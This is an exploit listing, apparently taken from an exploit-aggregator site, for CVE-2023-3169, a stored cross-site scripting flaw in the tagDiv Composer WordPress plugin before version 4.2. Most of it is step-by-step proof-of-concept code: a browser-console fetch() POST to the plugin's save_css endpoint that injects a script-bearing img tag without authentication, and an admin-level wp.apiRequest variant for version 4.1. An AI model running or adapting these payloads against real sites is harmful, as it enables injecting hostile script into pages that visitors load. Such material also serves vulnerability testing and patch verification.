Exploit for tagDiv Composer < 4.2 - Unauthenticated Stored XSS CVE-2023-3169

## https://sploitus.com/exploit?id=WPEX-ID:E6D8216D-ACE4-48BA-AFCA-74DA0DC5ABB5
Before 4.1:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Run the following code in the browser console while logged out:

fetch( '/wp-json/tdw/save_css', {
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    body: "compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E",
    method: "POST",
} );


In version 4.1, exploitable by Admin:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Log in as an admin, and run the following code in a browser console within WP Admin:

await wp.apiRequest( { path: 'tdw/save_css', type: 'POST', data: { compiled_css: "</style><img src=x onerror=alert('XSS-Checker')><style>" } } );

3. Load a frontend page to see the XSS.